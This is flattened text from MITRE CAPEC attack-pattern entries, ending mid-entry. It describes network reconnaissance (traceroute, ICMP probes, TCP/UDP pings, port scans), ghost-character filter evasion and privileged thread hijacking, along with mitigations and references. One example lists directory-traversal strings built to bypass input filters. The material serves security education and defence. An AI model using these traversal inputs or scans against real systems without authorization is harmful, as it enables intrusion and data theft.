3rd "Zero Day" Edition, Insecure.com LLC, ISBN: 978-0-9799587-1-7 2008 CAPEC Content Team MITRE 2013-12-18 Updated References CAPEC Content Team MITRE 2014-02-06 Updated Attack_Prerequisites An attacker uses a traceroute utility to map out the route which data flows through the network in route to a target destination. Tracerouting can allow an attacker to construct a working topology of systems and routers by listing the systems through which data passes through on their way to the targeted machine. This attack can return varied results depending upon the type of traceroute that is performed. Traceroute works by sending packets to a target while incrementing the Time-to-Live field in the packet header. As the packet traverses each hop along its way to the destination, its TTL expires generating an ICMP diagnostic message that identifies where the packet expired. Traditional techniques for tracerouting involved the use of ICMP and UDP. As more firewalls began to filter ingress ICMP, methods of traceroute using TCP were developed Network Layer Transport Layer Server-side Network Host Service A network capable of routing the attackers' packets to the destination network. Low A command line version of traceroute or similar tool that performs route enumeration. Confidentiality "Varies by context" 1000 Attack Pattern ChildOf 309 Stuart McClure Joel Scambray George Kurtz Hacking Exposed: Network Security Secrets & Solutions Chapter 2: Scanning, pp. 38-41 6th Edition McGraw Hill 2009 CAPEC Content Team MITRE 2014-02-06 Updated Attack_Prerequisites An attacker sends an ICMP Type 17 Address Mask Request to gather information about a target's networking configuration. ICMP Address Mask Requests are defined by RFC-950, "Internet Standard Subnetting Procedure." An Address Mask Request is an ICMP type 17 message that triggers a remote system to respond with a list of its related subnets, as well as its default gateway and broadcast address via an ICMP type 18 Address Mask Reply datagram. Gathering this type of information helps an attacker plan router-based attacks as well as denial-of-service attacks against the broadcast address. Many modern operating systems will not respond to ICMP type 17 messages for security reasons. Determining whether a system or router will respond to an ICMP Address Mask Request helps the attacker determine operating system or firmware version. Additionally, because these types of messages are rare they are easily spotted by intrusion detection systems. Many ICMP scanning tools support IP spoofing to help conceal the origin of the actual request among a storm of similar ICMP messages. It is a common practice for border firewalls and gateways to be configured to block ingress ICMP type 17 and egress ICMP type 18 messages. Network Layer Server-side Network Host The ability to send an ICMP type 17 query (Address Mask Request) to a remote target and receive an ICMP type 18 message (ICMP Address Mask Reply) in response. Generally, modern operating systems will ignore ICMP type 17 messages, however, routers will commonly respond to this request. Low The ability to send custom ICMP queries. This can be accomplished via the use of various scanners or utilities. The following tools allow a user to craft custom ICMP messages when performing reconnaissance: Confidentiality "Varies by context" Confidentiality Access_Control Authorization Hide activities 1000 Attack Pattern ChildOf 292 Stuart McClure Joel Scambray George Kurtz Hacking Exposed: Network Security Secrets & Solutions Chapter 2: Scanning, pp. 53-54 6th Edition McGraw Hill 2009 J. Mogul J. Postel RFC950 - Internet Standard Subnetting Procedure August 1985 http://www.faqs.org/rfcs/rfc950.html J. Postel RFC792 - Internet Control Messaging Protocol Defense Advanced Research Projects Agency (DARPA) September 1981 http://www.faqs.org/rfcs/rfc792.html Mark Wolfgang Host Discovery with Nmap November 2002 http://nmap.org/docs/discovery.pdf Gordon "Fyodor" Lyon Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning Section 3.7.2 ICMP Probe Selection, pg. 70 3rd "Zero Day" Edition, Insecure.com LLC, ISBN: 978-0-9799587-1-7 2008 CAPEC Content Team MITRE 2013-12-18 Updated References CAPEC Content Team MITRE 2014-02-06 Updated Attack_Prerequisites An attacker sends an ICMP type 13 Timestamp Request to determine the time as recorded by a remote target. Timestamp Replies, ICMP Type 14, usually return a value in Greenwich Mean Time. An attacker can attempt to use an ICMP Timestamp requests to 'ping' a remote system to see if is alive. An attacker may be able to use the timestamp returned from the target to attack time-based security algorithms, such as random number generators, or time-based authentication mechanisms. Additionally, because these types of messages are rare they are easily spotted by intrusion detection systems. Many ICMP scanning tools support IP spoofing to help conceal the origin of the actual request among a storm of similar ICMP messages. It is a common practice for border firewalls and gateways to be configured to block ingress ICMP type 13 and egress ICMP type 14 messages. Network Layer Server-side Network Host The ability to send an ICMP type 13 query (Timestamp Request) to a remote target and receive an ICMP type 14 message (Timestamp Reply) in response. Low The ability to send custom ICMP queries. This can be accomplished via the use of various scanners or utilities. Confidentiality "Varies by context" 1000 Attack Pattern ChildOf 292 Stuart McClure Joel Scambray George Kurtz Hacking Exposed: Network Security Secrets & Solutions Chapter 2: Scanning, pp. 44-51 6th Edition McGraw Hill 2009 J. Postel RFC792 - Internet Control Messaging Protocol Defense Advanced Research Projects Agency (DARPA) September 1981 http://www.faqs.org/rfcs/rfc792.html R. Braden, Ed. RFC1122 - Requirements for Internet Hosts - Communication Layers October 1989 http://www.faqs.org/rfcs/rfc1122.html Mark Wolfgang Host Discovery with Nmap November 2002 http://nmap.org/docs/discovery.pdf Gordon "Fyodor" Lyon Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning Section 3.7.2 ICMP Probe Selection, pg. 70 3rd "Zero Day" Edition Insecure.com LLC, ISBN: 978-0-9799587-1-7 2008 CAPEC Content Team MITRE 2013-12-18 Updated References An attacker sends an ICMP Information Request to a host to determine if it will respond to this deprecated mechanism. ICMP Information Requests are a deprecated message type that no has any use. Information Requests were originally used for diskless machines to automatically obtain their network configuration, but this message type has been superseded by more robust protocol implementations like DHCP. Network Layer Server-side Network Host The ability to send an ICMP Type 15 Information Request and receive an ICMP Type 16 Information Reply in response. Low The ability to send custom ICMP queries. This can be accomplished via the use of various scanners or utilities. Confidentiality "Varies by context" 1000 Attack Pattern ChildOf 292 Stuart McClure Joel Scambray George Kurtz Hacking Exposed: Network Security Secrets & Solutions Chapter 2: Scanning, pp. 44-51 6th Edition McGraw Hill 2009 J. Postel RFC792 - Internet Control Messaging Protocol Defense Advanced Research Projects Agency (DARPA) September 1981 http://www.faqs.org/rfcs/rfc792.html R. Braden, Ed. RFC1122 - Requirements for Internet Hosts - Communication Layers October 1989 http://www.faqs.org/rfcs/rfc1122.html Mark Wolfgang Host Discovery with Nmap November 2002 http://nmap.org/docs/discovery.pdf Gordon "Fyodor" Lyon Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning Section 3.7.2 ICMP Probe Selection, pg. 70 3rd "Zero Day" Edition, Insecure.com LLC, ISBN: 978-0-9799587-1-7 2008 CAPEC Content Team MITRE 2013-12-18 Updated References An attacker sends a TCP segment with the ACK flag set to a remote host for the purpose of determining if the host is alive. This is one of several TCP 'ping' types. The RFC 793 expected behavior for a service is to respond with a RST 'reset' packet to any unsolicited ACK segment that is not part of an existing connection. So by sending an ACK segment to a port, an attacker identify that the host is alive by looking for a RST packet. Typically a remote server will respond with a RST regardless of whether a port is open or closed. In either case, the attacker can determine that the host is alive. TCP ACK pings cannot discover the state of a remote port because the behavior is the same in either case. TCP ACK pings are most likely to fail in cases where a stateful firewall is present. The firewall will look up the ACK packet in its state-table and discard the segment because it does not correspond to any active connection. A TCP ACK Ping has the following characteristics: 1. Host Discovery: Can be used to discover if a host is alive via RST response packets sent from the host. 2. Effective Against: Stateless Firewalls due to a typical lack of rules that reject unsolicited ACK packets. 3. Weak Against: Stateful Firewalls due to the ability to reject a packet not part of an existing connection. 4. Port State: Unable to determine if a port is open or closed. The tool nmap will send TCP ACK pings when the command line "-PA" switch is used. Sending an ACK ping requires the ability to access "raw sockets" in order to create the packets with direct access to the packet header. Transport Layer Server-side Host The ability to send an ACK packet to a remote host and identify the response. Creating the ACK packet without building a full connection requires the use of raw sockets. As a result, it is not possible to send a TCP ACK ping from some systems (Windows XP SP 2) without the use of third-party packet drivers like Winpcap. On other systems (BSD, Linux) administrative privileges are required in order to write to the raw socket. Low The ability to craft custom TCP ACK segments for use during network reconnaissance. ACK scanning can be performed via the use of a port scanner or by raw socket manipulation using a scripting or programming language. Packet injection tools are also useful for this purpose. Depending upon the technique used it may also be necessary to sniff the network in order to see the response. Confidentiality "Varies by context" Confidentiality Access_Control Authorization Bypass protection mechanism Hide activities 1000 Attack Pattern ChildOf 292 Stuart McClure Joel Scambray George Kurtz Hacking Exposed: Network Security Secrets & Solutions Chapter 2: Scanning, pg. 49 6th Edition McGraw Hill 2009 Defense Advanced Research Projects Agency Information Processing Techniques Office Information Sciences Institute University of Southern California RFC793 - Transmission Control Protocol Defense Advanced Research Projects Agency (DARPA) September 1981 http://www.faqs.org/rfcs/rfc793.html Gordon "Fyodor" Lyon Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning Section 3.6.2 TCP ACK Ping, pg. 61 3rd "Zero Day" Edition, Insecure.com LLC, ISBN: 978-0-9799587-1-7 2008 Mark Wolfgang Host Discovery with Nmap November 2002 http://nmap.org/docs/discovery.pdf CAPEC Content Team MITRE 2013-12-18 Updated References An attacker sends a UDP datagram to the remote host to determine if the host is alive. If a UDP datagram is sent to an open UDP port there is very often no response, so a typical strategy for using a UDP ping is to send the datagram to a random high port on the target. The goal is to solicit an ICMP port unreachable message from the target, indicating that the host is alive. UDP pings are useful because some firewalls are not configured to block UDP datagrams sent to strange or typically unused ' ports, like ports in the 65K range. Additionally, while some firewalls may filter incoming ICMP, weaknesses in firewall rule-sets may allow certain types of ICMP (host unreachable, port unreachable) which are useful for UDP ping attempts. A UDP Ping has the following characteristics: 1. Host Discovery: Can be used to discover if a host is alive via ICMP Port Unreachable Messages. 2. Effective Against: Firewalls that allow some incoming UDP which are not configured to block egress ICMP messages. 3. Weak Against: Firewalls properly configured to block UDP datagrams that are also block egress ICMP messages. 4. Port State: Able to determine if a port is closed via ICMP Port Unreachable Messages. Network Layer Server-side Host The ability to send a UDP datagram to a remote host and receive a response. Low The ability to craft custom UDP Packets for use during network reconnaissance. UDP pings can be performed via the use of a port scanner or by raw socket manipulation using a scripting or programming language. Packet injection tools are also useful for this purpose. Depending upon the technique used it may also be necessary to sniff the network in order to see the response. Confidentiality "Varies by context" Confidentiality Access_Control Authorization Bypass protection mechanism Hide activities 1000 Attack Pattern ChildOf 292 Stuart McClure Joel Scambray George Kurtz Hacking Exposed: Network Security Secrets & Solutions Chapter 2: Scanning, pg. 47 6th Edition McGraw Hill 2009 J. Postel RFC768 - User Datagram Protocol August 28, 1980 http://www.faqs.org/rfcs/rfc768.html Mark Wolfgang Host Discovery with Nmap November 2002 http://nmap.org/docs/discovery.pdf Gordon "Fyodor" Lyon Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning Section 3.6.3 TCP UDP Ping, pg. 63 3rd "Zero Day" Edition, Insecure.com LLC, ISBN: 978-0-9799587-1-7 2008 CAPEC Content Team MITRE 2013-12-18 Updated References An attacker uses a TCP SYN packets as a means of purpose of host discovery. Typical RFC 793 behavior specifies that when a TCP port is open, a host must respond to an incoming SYN "synchronize" packet by completing stage two of the 'three-way handshake' by sending an SYN/ACK in response. When a port is closed, RFC 793 behavior is to respond with a RST "reset" packet. This behavior can be used to 'ping' a target to see if it is alive by sending a TCP SYN packet to a port and then looking for a RST or an ACK packet in response. Due to the different responses from open and closed ports, SYN packets can be used to determine the remote state of the port. A TCP SYN ping is also useful for discovering alive hosts protected by a stateful firewall. In cases where a specific firewall rule does not block access to a port, a SYN packet can pass through the firewall to the host and solicit a response from either an open or closed port. When a stateful firewall is present SYN pings are preferable to ACK pings, because a stateful firewall will typically drop all unsolicited ACK packets because they are not part of an existing or new connection. TCP SYN pings often fail when a stateless ACL or firewall is configured to blanket-filter incoming packets to a port. The firewall device will discard any SYN packets to a blocked port. An attacker will often alternate between SYN and ACK pings to discover if a host is alive. A TCP SYN ping has the following characteristics: 1. Host Discovery: Can be used to discover if a host is alive via ACK or RST packets. 2. Effective Against: Stateful Firewalls that allow incoming new connections to target ports. 3. Weak Against: Stateless firewalls that blanket-filter incoming SYN 4. Port State: Able to determine port state via SYN/ACK or RST response. Transport Layer Server-side Host The ability to send a TCP SYN packet to a remote target. Depending upon the operating system, the ability to craft SYN packets may require elevated privileges. Low The ability to craft custom TCP segments for use during network reconnaissance. SYN pings can be performed via the use of a port scanner or by raw socket manipulation using a scripting or programming language. Packet injection tools are also useful for this purpose. Depending upon the technique used it may also be necessary to sniff the network in order to see the response. Confidentiality "Varies by context" Confidentiality Access_Control Authorization Bypass protection mechanism Hide activities 1000 Attack Pattern ChildOf 292 Stuart McClure Joel Scambray George Kurtz Hacking Exposed: Network Security Secrets & Solutions Chapter 2: Scanning, pg. 48 6th Edition McGraw Hill 2009 Defense Advanced Research Projects Agency Information Processing Techniques Office Information Sciences Institute University of Southern California RFC793 - Transmission Control Protocol Defense Advanced Research Projects Agency (DARPA) September 1981 http://www.faqs.org/rfcs/rfc793.html Gordon "Fyodor" Lyon Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning Section 3.6.2 TCP SYN Ping, pg. 61 3rd "Zero Day" Edition, Insecure.com LLC, ISBN: 978-0-9799587-1-7 2008 Mark Wolfgang Host Discovery with Nmap November 2002 http://nmap.org/docs/discovery.pdf CAPEC Content Team MITRE 2013-12-18 Updated References An attacker intentionally introduces leading characters that enable getting the input past the filters. The API that is being targeted, ignores the leading "ghost" characters, and therefore processes the attackers' input. This occurs when the targeted API will accept input data in several syntactic forms and interpret it in the equivalent semantic way, while the filter does not take into account the full spectrum of the syntactic forms acceptable to the targeted API. Some APIs will strip certain leading characters from a string of parameters. Perhaps these characters are considered redundant, and for this reason they are removed. Another possibility is the parser logic at the beginning of analysis is specialized in some way that causes some characters to be removed. The attacker can specify multiple types of alternative encodings at the beginning of a string as a set of probes. One commonly used possibility involves adding ghost characters--extra characters that don't affect the validity of the request at the API layer. If the attacker has access to the API libraries being targeted, certain attack ideas can be tested directly in advance. Once alternative ghost encodings emerge through testing, the attacker can move from lab-based API testing to testing real-world service implementations. Determine if the source code is available and if so, examine the filter logic. If the source code is not available, write a small program that loops through various possible inputs to given API call and tries a variety of alternate (but equivalent) encodings of strings with leading ghost characters. Knowledge of frameworks and libraries used and what filters they apply will help to make this search more structured. Observe the effects. See if the probes are getting past the filters. Identify a string that is semantically equivalent to that which an attacker wants to pass to the targeted API, but syntactically structured in a way as to get past the input filter. That encoding will contain certain ghost characters that will help it get past the filters. These ghost characters will be ignored by the targeted API. Once the "winning" alternate encoding using (typically leading) ghost characters is identified, an attacker can launch the attacks against the targeted API (e.g. directory traversal attack, arbitrary shell command execution, corruption of files) The targeted API must ignore the leading ghost characters that are used to get past the filters for the semantics to be the same. Medium Medium Injection API Abuse Alternate Encoding with Ghost Characters in FTP and Web Servers Some web and FTP servers fail to detect prohibited upward directory traversals if the user-supplied pathname contains extra characters such as an extra leading dot. For example, a program that will disallow access to the pathname "../test.txt" may erroneously allow access to that file if the pathname is specified as ".../test.txt". This attack succeeds because 1) the input validation logic fails to detect the triple-dot as a directory traversal attempt (since it isn't dot-dot), 2) some part of the input processing decided to strip off the "extra" dot, leaving the dot-dot behind. Using the file system API as the target, the following strings are all equivalent to many programs: .../../../test.txt ............/../../test.txt ..?/../../test.txt ..????????/../../test.txt ../test.txt As you can see, there are many ways to make a semantically equivalent request. All these strings ultimately result in a request for the file ../test.txt. Medium Perform white list rather than black list input validation. Canonicalize all data prior to validation. Take an iterative approach to input validation (defense in depth). Confidentiality Access_Control Authorization Gain privileges / assume identity Integrity Modify application data Web Form, URL, Network Socket, File The payload is the parameter that an attacker is supplying to the targeted API that will allow the attacker to elevate privilege and subvert the authorization service. The targeted API is the activation zone. These attacks often target the file system or the shell to execute commands. Failure in authorization service may lead to compromises in data confidentiality and integrity. 173 Targeted 41 Targeted 172 Targeted 171 Targeted 179 Targeted 180 Targeted 181 Secondary 183 Secondary 184 Secondary 20 Targeted 74 Targeted 697 Targeted 707 Targeted 1000 Attack Pattern ChildOf 267 Defense in Depth Reluctance to Trust Least Privilege Perform input validation and filtering on data in its canonical form. Understand the APIs to which user input will be passed and know how permissive they are. Perform appropriate input validation given that information. Exploitation Low Low High All All All All G. Hoglund G. McGraw Exploiting Software: How to Break Code Addison-Wesley February 2004 [R.3.1][REF-2] Cigital, Inc 2007-03-01 [R.3.1][REF-2] Cigital, Inc 2007-03-01 Eugene Lebanidze Cigital, Inc 2007-02-26 Fleshed out content to CAPEC schema from the original descriptions in "Exploiting Software" Sean Barnum Cigital, Inc 2007-03-05 Review and revise Richard Struse VOXEM, Inc 2007-03-26 Review and feedback leading to changes in Name, Attack Execution Flow and Examples Sean Barnum Cigital, Inc 2007-04-13 Modified pattern content according to review and feedback Eugene Lebanidze Cigital, Inc 2007-02-26 Fleshed out content to CAPEC schema from the original descriptions in "Exploiting Software" Sean Barnum Cigital, Inc 2007-03-05 Review and revise Richard Struse VOXEM, Inc 2007-03-26 Review and feedback leading to changes in Name, Attack Execution Flow and Examples Sean Barnum Cigital, Inc 2007-04-13 Modified pattern content according to review and feedback Eugene Lebanidze Cigital, Inc 2007-02-26 Fleshed out content to CAPEC schema from the original descriptions in "Exploiting Software" Richard Struse VOXEM, Inc 2007-03-26 Review and feedback leading to changes in Name, Attack Execution Flow and Examples Sean Barnum Cigital, Inc 2007-04-13 Modified pattern content according to review and feedback Eugene Lebanidze Cigital, Inc 2007-02-26 Fleshed out content to CAPEC schema from the original descriptions in "Exploiting Software" Richard Struse VOXEM, Inc 2007-03-26 Review and feedback leading to changes in Name, Attack Execution Flow and Examples Sean Barnum Cigital, Inc 2007-04-13 Modified pattern content according to review and feedback CAPEC Content Team MITRE 2014-02-06 Updated Activation_Zone, Attack_Phases, Attack_Prerequisites, Description Summary, Payload Attackers can sometimes hijack a privileged thread from the underlying system through synchronous (calling a privileged function that returns incorrectly) or asynchronous (callbacks, signal handlers, and similar) means. Having done so, the Attacker may not only likely access functionality the system's designer didn't intend for them, but they may also go undetected or deny other users essential service in a catastrophic (or insidiously subtle) way. Attacker determines the underlying system thread that is subject to user-control Attacker then provides input, perhaps by way of environment variables for the process in question, that affect the executing thread Upon successful hijacking, the attacker enjoys elevated privileges, and can possibly have the hijacked thread do his bidding The application in question employs a threaded model of execution with the threads operating at, or having the ability to switch to, a higher privilege level than normal users In order to feasibly execute this class of attacks, the attacker must have the ability to hijack a privileged thread. This ability includes, but is not limited to, modifying environment variables that affect the process the thread belongs to, or providing malformed user-controllable input that causes the executing thread to fault and return to a higher privilege level or such. This does not preclude network-based attacks, but makes them conceptually more difficult to identify and execute. Very High Low Analysis Modification of Resources API Abuse Attacker targets an application written using Java's AWT, with the 1.2.2 era event model. In this circumstance, any AWTEvent originating in the underlying OS (such as a mouse click) would return a privileged thread. The Attacker could choose to not return the AWT-generated thread upon consuming the event, but instead leveraging its privilege to conduct privileged operations. High Hijacking a thread involves knowledge of how processes and threads function on the target platform, the design of the target application as well as the ability to identify the primitives to be used or manipulated to hijack the thread. The attacker needs to be able to latch onto a privileged thread. No special hardware or software tool-based resources are required. The Attacker does, however, need to be able to program, compile, and link to the victim binaries being executed so that it will turn control of a privileged thread over to the Attacker's malicious code. This is the case even if the attacker conducts the attack remotely. The attacker may attach a debugger to the executing process and observe the spawning and cleanup of threads, as well as the switches in privilege levels The attacker can also observe the environment variables, if any, that affect executing threads and modify them in order to observe their effect on the execution. Application Architects must be careful to design callback, signal, and similar asynchronous constructs such that they shed excess privilege prior to handing control to user-written (thus untrusted) code. Application Architects must be careful to design privileged code blocks such that upon return (successful, failed, or unpredicted) that privilege is shed prior to leaving the block/scope. Confidentiality Access_Control Authorization Gain privileges / assume identity Confidentiality Integrity Availability Execute unauthorized code or commands Run Arbitrary Code 270 Secondary 1000 Category ChildOf 232 Only those constructs within the application that cannot execute without elevated privileges must be granted additional privileges. Often times, the entire function or the entire process is granted privileges that are usually not necessary. The callee must ensure that additional privileges are shed before returning to the caller. This avoids pinning the responsibility on an inadvertent caller who may not have a clue about the innards of the callee. Least Privilege Complete Mediation Minimize privileged code blocks Shed any privileges not required to execute at the earliest Treat the Entire Inherited Process Context as Unvalidated Input Exploitation High High Low All All All All John Steven Cigital, Inc 2007-02-10 Initial core pattern content John Steven Cigital, Inc 2007-02-10 Initial core pattern content Chiradeep B. Chhaya Cigital, Inc 2007-02-28 Fleshed out pattern with extra content Sean Barnum Cigital, Inc 2007-03-07 Review and revise Chiradeep B. Chhaya Cigital, Inc 2007-02-28 Fleshed out pattern with extra content Sean Barnum Cigital, Inc 2007-03-07 Review and revise CAPEC Content Team MITRE 2013-12-18 Updated Related_Attack_Patterns Chiradeep B. Chhaya Cigital, Inc 2007-02-28 Fleshed out pattern with extra content Chiradeep B. Chhaya Cigital, Inc 2007-02-28 Fleshed out pattern with extra content CAPEC Content Team MITRE 2013-12-18 Updated Related_Attack_Patterns CAPEC Content Team MITRE 2014-02-06 Updated Attack_Phases, Relevant_Security_Requirements, Resources_Required An attacker uses a combination of techniques to determine the state of the ports on a remote target. Any service or application available for TCP or UDP networking will have a port open for communications over the network. Although common services have assigned port numbers, services and applications can run on arbitrary ports. Additionally, port scanning is complicated by the potential for any machine to have up to 65535 possible UDP or TCP services. The goal of port scanning is often broader than identifying open ports, but also give the attacker information concerning the firewall configuration. Depending upon the method of scanning that is used, the process can be stealthy or more obtrusive, the latter being more easily detectable due to the volume of packets involved, anomalous packet traits, or system logging. Typical port scanning activity involves sending probes to a range of ports and observing the responses. There are four types of port status that a port scan usually attempts to discover: 1. Open Port: The port is open and a firewall does not block access to the port 2. Closed Port: The port is closed (i.e. no service resides there) and a firewall does not block access to the port 3. Filtered Port: A firewall or ACL rule is blocking access to the port in some manner, although the presence of a listening service on the port cannot be verified 4. Unfiltered Port: A firewall or ACL rule is not blocking access to the port, although the presence of a listening service on the port cannot be verified. For strategic purposes it is useful for an attacker to distinguish between an open port that is protected by a filter vs. a closed port that is not protected by a filter. Making these fine grained distinctions is impossible with certain scan types. A TCP connect scan, for instance, cannot distinguish a blocked port with an active service from a closed port that is not firewalled. Other scan types can only detect closed ports, while others cannot detect port state at all, only the presence or absence of filters. Collecting this type of information tells the attacker which ports can be attacked directly, which must be attacked with filter evasion techniques like fragmentation, source port scans, and which ports are unprotected (i.e. not firewalled) but aren't hosting a network service. An attacker often combines various techniques in order to gain a more complete picture of the firewall filtering mechanisms in place for a host. Network Layer Transport Layer Server-side Network Host Low The ability to craft arbitrary packets of various protocol types for use during network reconnaissance. This can be achieved via the use of a network mapper or scanner, or via socket programming in a scripting language. Packet injection tools are also useful for this purpose. Depending upon the method used it may be necessary to sniff the network in order to see the response. Confidentiality "Varies by context" Confidentiality Access_Control Authorization Bypass protection mechanism Hide activities 1000 Attack Pattern ChildOf 310 Stuart McClure Joel Scambray George Kurtz Hacking Exposed: Network Security Secrets & Solutions Chapter 2: Scanning, pg. 54 6th Edition McGraw Hill 2009 Defense Advanced Research Projects Agency Information Processing Techniques Office Information Sciences Institute University of Southern California RFC793 - Transmission Control Protocol Defense Advanced Research Projects Agency (DARPA) September 1981 http://www.faqs.org/rfcs/rfc793.html J. Postel RFC768 - User Datagram Protocol August 28, 1980 http://www.faqs.org/rfcs/rfc768.html Gordon "Fyodor" Lyon Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning Section 4.1 Introduction to Port Scanning, pg. 73 3rd "Zero Day" Edition, Insecure.com LLC, ISBN: 978-0-9799587-1-7 2008 Gordon "Fyodor" Lyon The Art of Port Scanning Volume: 7, Issue. 51 Phrack Magazine 1997 http://www.phrack.org/issues.html?issue=51&id=11#article CAPEC Content Team MITRE 2013-12-18 Updated References CAPEC Content Team MITRE 2014-02-06 Updated Description Summary An attacker uses full TCP connection attempts to determine if a port is open. The scanning process involves completing a 'three-way handshake' with a remote port, and reports the port as closed if the full handshake cannot be established. An advantage of TCP connect scanning is that it works against any TCP/IP stack. RFC 793 defines how TCP connections are established and torn down. TCP connect scanning commonly involves establishing a full connection, and then subsequently tearing it down, and therefore involves sending a significant number of packets to each port that is scanned. This type of scanning has the following characteristics. Compared to other types of scans, a TCP Connect scan is slow and methodical. This type of scanning causes considerable noise in system logs and can be spotted by IDS/IPS systems. In terms of port status, TCP Connect scanning can detect when a port is open by completing the three-way handshake, but it cannot distinguish a port that is unfiltered with no service running on it from a port that is filtered by a firewall but contains an active service. Due to the significant volume of packets exchanged per port, TCP connect scanning can become very time consuming. Generally, it is not used as a method for performing a comprehensive port scan, but is reserved for checking a short list of common ports. A TCP Connect scan has the following characteristics: 1. Speed: TCP Connect scanning is very slow. 2. Stealth: TCP SYN scanning is extremely noisy and involves a significant number of packets. 3. Open Port: Detects that a port is open via a successful three-way handshake 4. Filtered Port: Cannot distinguish a closed (unfiltered) port from an open (filtered) port. 5 .Unfiltered Port: Can detect an unfiltered port only when the unfiltered port is in front of an active TCP/IP service. The TCP Connect scan has the advantage of versatility and ease of use in that it works equally well against all TCP stacks and that it is easy for a novice to interpret the results of the scan due to its all or nothing nature. Its disadvantages are noise, speed, and poor visibility into the filter structure of a firewall. As a general rule, performing a full TCP connect scan against a host can take multiple days. Transport Layer Server-side Host Service The TCP connect requires the ability to connect to an available port and complete a 'three-way-handshake' This scanning technique does not require any special privileges in order to perform. This type of scan works against all TCP/IP stack implementations. Low The ability to build full TCP connections with a target. This can be achieved via the use of a network mapper or scanner, or via routine socket programming in a scripting language. This can be achieved via the use of a network mapper or scanner, or via socket programming in a scripting language. Packet injection tools are also useful for this purpose. Depending upon the method used it may be necessary to sniff the network to see the response. Confidentiality Read application data 1000 Attack Pattern ChildOf 300 Stuart McClure Joel Scambray George Kurtz Hacking Exposed: Network Security Secrets & Solutions Chapter 2: Scanning, pg. 54 6th Edition McGraw Hill 2009 Defense Advanced Research Projects Agency Information Processing Techniques Office Information Sciences Institute University of Southern California RFC793 - Transmission Control Protocol Defense Advanced Research Projects Agency (DARPA) September 1981 http://www.faqs.org/rfcs/rfc793.html Gordon "Fyodor" Lyon Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning Section 5.3 TCP Connect Scanning, pg. 100 3rd "Zero Day" Edition, Insecure.com LLC, ISBN: 978-0-9799587-1-7 2008 Gordon "Fyodor" Lyon The Art of Port Scanning Volume: 7, Issue. 51 Phrack Magazine 1997 http://www.phrack.org/issues.html?issue=51&id=11#article CAPEC Content Team MITRE 2013-12-18 Updated References An attacker uses a TCP FIN scan to determine if ports are closed on the target machine. This scan type is accomplished by sending TCP segments with the FIN bit set in the packet header. The RFC 793 expected behavior is that any TCP segment with an out-of-state Flag sent to an open port is discarded, whereas segments with out-of-state flags sent to closed ports should be handled with a RST in response. This behavior should allow an attacker to scan for closed ports by sending certain types of rule-breaking packets (out of sync or disallowed by the TCB) and detect closed ports via RST packets. The major advantage of this scan type is its ability to scan through stateless firewall or ACL filters. Such filters are configured to block access to ports usually by preventing SYN packets, thus stopping any attempt to 'build' a connection. FIN packets, like out-of-state ACK packets, tend to pass through such devices undetected. Many operating systems, however, do not implement RFC 793 exactly and for this reason FIN scans do not work as expected against these devices. Some operating systems, like Microsoft Windows, send a RST packet in response to any out-of-sync (or malformed) TCP segments received by a listening socket (rather than dropping the packet via RFC 793), thus preventing an attacker from distinguishing between open and closed ports. 1. Speed: TCP FIN scanning is fast compared to other types of scans 2. Stealth: TCP FIN scanning is stealthy compared to other types of scans 3. Open Port: Detects an open port via no response to the segment 4. Closed Port: Detects that a closed via a RST received in response to the FIN 5. Filtered Port: Cannot distinguish between a filtered port and an open port 6. Unfiltered Port: Cannot distinguish between an unfiltered port and a non-stateful filtered port FIN scans are limited by the range of platforms against which they work. Additionally, because open ports are inferred via no responses being generated, one cannot distinguish an open port from a filtered port without further analysis. For instance, FIN scanning a system protected by a stateful firewall may indicate all ports being open. For these reasons, FIN scanning results must always be interpreted as part of a larger scanning strategy. FIN scanning is still relatively stealthy as the packets tend to blend in with the background noise on a network link. FIN scans are detected via heuristic (non-signature) based algorithms, much in the same way as other scan types are detected. Transport Layer Server-side Host Service FIN scanning requires the use of raw sockets, and thus cannot be performed from some Windows systems (Windows XP SP 2, for example). On Unix and Linux, raw socket manipulations require root privileges. Low The ability to send TCP FIN segments to a host during network reconnaissance. This can be achieved via the use of a network mapper or scanner, or via raw socket programming in a scripting language. Packet injection tools are also useful for this purpose. Depending upon the method used it may be necessary to sniff the network in order to see the response. Confidentiality "Varies by context" Confidentiality Access_Control Authorization Bypass protection mechanism Hide activities 1000 Attack Pattern ChildOf 300 Stuart McClure Joel Scambray George Kurtz Hacking Exposed: Network Security Secrets & Solutions Chapter 2: Scanning, pg. 55 6th Edition McGraw Hill 2009 Defense Advanced Research Projects Agency Information Processing Techniques Office Information Sciences Institute University of Southern California RFC793 - Transmission Control Protocol Defense Advanced Research Projects Agency (DARPA) September 1981 http://www.faqs.org/rfcs/rfc793.html Gordon "Fyodor" Lyon Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning Section 5.5 TCP FIN, NULL, XMAS Scans, pg. 107 3rd "Zero Day" Edition Insecure.com LLC, ISBN: 978-0-9799587-1-7 2008 Gordon "Fyodor" Lyon The Art of Port Scanning Volume: 7, Issue. 51 Phrack Magazine 1997 http://www.phrack.org/issues.html?issue=51&id=11#article CAPEC Content Team MITRE 2013-12-18 Updated References An attacker uses a TCP XMAS scan to determine if ports are closed on the target machine. This scan type is accomplished by sending TCP segments with the all flags sent in the packet header, generating packets that are illegal based on RFC 793. The RFC 793 expected behavior is that any TCP segment with an out-of-state Flag sent to an open port is discarded, whereas segments with out-of-state flags sent to closed ports should be handled with a RST in response. This behavior should allow an attacker to scan for closed ports by sending certain types of rule-breaking packets (out of sync or disallowed by the TCB) and detect closed ports via RST packets. he major advantage of this scan type is its ability to scan through stateless firewall or ACL filters. Such filters are configured to block access to ports usually by preventing SYN packets, thus stopping any attempt to 'build' a connection. XMAS packets, like out-of-state FIN or ACK packets, tend to pass through such devices undetected. Many operating systems, however, do not implement RFC 793 exactly and for this reason FIN scans do not work as expected against these devices. Some operating systems, like Microsoft Windows, send a RST packet in response to any out-of-sync (or malformed) TCP segments received by a listening socket (rather than dropping the packet via RFC 793), thus preventing an attacker from distinguishing between open and closed ports. 1. Speed: TCP XMAS scanning is fast compared to other types of scans 2. Stealth: 